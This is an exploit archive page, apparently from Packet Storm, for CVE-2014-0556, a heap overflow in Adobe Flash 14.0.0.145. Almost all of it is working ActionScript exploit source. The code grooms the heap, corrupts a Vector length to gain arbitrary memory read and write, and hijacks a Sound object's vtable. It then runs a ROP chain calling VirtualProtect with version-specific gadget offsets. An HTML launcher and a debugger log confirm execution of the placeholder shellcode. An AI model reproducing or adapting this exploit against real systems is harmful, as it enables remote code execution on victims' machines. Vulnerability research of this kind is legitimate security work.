what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Adobe Flash 14.0.0.145 copyPixelsToByteArray() Heap Overflow

Adobe Flash 14.0.0.145 copyPixelsToByteArray() Heap Overflow
Posted Sep 30, 2014
Authored by hdarwin

Adobe Flash version 14.0.0.145 copyPixelsToByteArray() heap overflow proof of concept exploit.

tags | exploit, overflow, proof of concept
advisories | CVE-2014-0556
SHA-256 | 166a57b3405bb750c323b5344a65f63fcd9ab165a71edf5188ec594b3a88fa98

Adobe Flash 14.0.0.145 copyPixelsToByteArray() Heap Overflow

Change Mirror Download
/*
<html>
<head>
<title>CVE-2014-0556</title>
</head>
<body>
<object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br>
<button onclick="swf.exploit()">STOP</button>
</body>
</html>
*/
/*
(1728.eb0): Break instruction exception - code 80000003 (first chance)
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d63048 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
08d63048 cc int 3
1:020> dd esp l4
08d63048 cccccccc cccccccc cccccccc cccccccc
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d63049 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
08d63049 cc int 3
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d6304a esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
08d6304a cc int 3
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d6304b esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
08d6304b cc int 3
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d6304c esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
08d6304c cc int 3
*/
package
{
import flash.events.*
import flash.media.*
import flash.display.*
import flash.geom.*
import flash.utils.*
import flash.text.*
import flash.external.ExternalInterface

public class Main extends Sprite {
private var i0:uint
private var i1:uint
private var i2:uint
private var i3:uint
private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & Flash 14.0.0.145")
private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200)
private var ob:Vector.<Object> = new Vector.<Object>(6400)
private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff)
private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4)
private var snd:Sound
private var vector:uint
private var vtable:uint
private var flash:uint
public function Main():void {

for (i0 = 0; i0 < 3200; i0++) {
ba[i0] = new ByteArray()
ba[i0].length = 0x2000
ba[i0].position = 0xfffff000
}

for (i0 = 0; i0 < 3200; i0++) {
if (i0 % 2 == 0) ba[i0] = null
ob[i0 * 2] = new Vector.<uint>(1008)
ob[i0 * 2 + 1] = new Vector.<uint>(1008)
}

bitmap.copyPixelsToByteArray(rect, ba[1601])

for (i0 = 0; ; i0++)
if (ob[i0].length != 1008) break

ob[i0][1024 * 3 - 2] = 0xffffffff

for (i1 = 0; ; i1++) {
if (i0 == i1) continue
if (ob[i1].length != 1008) break
}

ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff
ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1]
ob[i0].fixed = true

for (i2 = 1000; ; i2++) {
if (ob[i1][0xFFFFFFFF - i2 + 0] == 0 && ob[i1][0xFFFFFFFF - i2 + 10] == 1 && ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15]) {
vector = ob[i1][0xFFFFFFFF - i2 + 11]
break
} else if (ob[i1][i2 + 0] == 0 && ob[i1][i2 + 10] == 1 && ob[i1][i2 + 5] == ob[i1][i2 + 15]) {
vector = ob[i1][i2 + 11]
break
}
}

snd = new Sound()

for (i2 = 0; i2 < 6400; i2++) {
if (i2 == i0 || i2 == i1) continue
ob[i2] = null
ob[i2] = new Vector.<Object>(1014)
ob[i2][0] = snd
ob[i2][1] = snd
}

for (i2 = 0; ; i2++) {
if (ob[i0][i2 + 0] == 1014 &&
ob[i0][i2 + 1] == ob[i0][i2 + 2] &&
ob[i0][i2 + 3] == 1
) {
vtable = read(ob[i0][i2 + 1] - 1)
flash = vtable - 0x00c3c1e8 // Flash32_14_0_0_145.ocx
write(ob[i0][i2 + 1] - 1, vector + 0xf54)
for (i3 = 0; i3 < 1008; i3++) {
ob[i0][i3] = 0x41414100 | i3
}
ob[i0][0] = flash + 0x004d6c50 // POP EBP # RETN
ob[i0][1] = flash + 0x004d6c50 // skip 4 bytes
ob[i0][2] = flash + 0x00a21b36 // POP EBX # RETN
ob[i0][3] = 0x00000201 // 0x00000201
ob[i0][4] = flash + 0x008ec368 // POP EDX # RETN
ob[i0][5] = 0x00000040 // 0x00000040
ob[i0][6] = flash + 0x00691119 // POP ECX # RETN
ob[i0][7] = vector + 2000 // Writable location
ob[i0][8] = flash + 0x005986d2 // POP EDI # RETN
ob[i0][9] = flash + 0x00061984 // RETN (ROP NOP)
ob[i0][10] = flash + 0x001bf342 // POP ESI # RETN
ob[i0][11] = flash + 0x0000d83f // JMP [EAX]
ob[i0][12] = flash + 0x000222b5 // POP EAX # RETN
ob[i0][13] = flash + 0x00b8a3a8 // ptr to VirtualProtect()
ob[i0][14] = flash + 0x00785916 // PUSHAD # RETN
ob[i0][15] = flash + 0x0017b966 // ptr to 'jmp esp'
ob[i0][16] = 0xcccccccc // shellcode
ob[i0][17] = 0xcccccccc // shellcode
ob[i0][18] = 0xcccccccc // shellcode
ob[i0][19] = 0xcccccccc // shellcode
ob[i0][979] = flash + 0x0029913A // POP EAX # RETN
ob[i0][980] = 0x00000f58
ob[i0][981] = flash + 0x00195558 // PUSH ESP # POP ESI # RETN
ob[i0][982] = flash + 0x0036B3B2 // SUB ESI,EAX # POP ECX # MOV EAX,ESI # POP ESI # RETN
ob[i0][985] = flash + 0x0095024c // XCHG EAX,ESP # RETN
ob[i0][1007] = flash + 0x0095024c // XCHG EAX,ESP # RETN
break
}
}

ob[i1][0xFFFFFFFE - 1024 * 3] = 4096
ob[i0][1024 * 3 - 2] = 0
str += flash.toString(16)
var tf:TextField = new TextField(); tf.width = 800; tf.height = 800; tf.text = str; addChild(tf)

if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit)
}

private function write(addr:uint, data:uint):void {
ob[i0][(addr - vector) / 4 - 2] = data
}

private function read(addr:uint):uint {
return ob[i0][(addr - vector) / 4 - 2]
}

private function zeroPad(number:String, width:int):String {
if (number.length < width)
return "0" + zeroPad(number, width-1)
return number
}

public function exploit():void {
snd.toString()
}
}
}
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close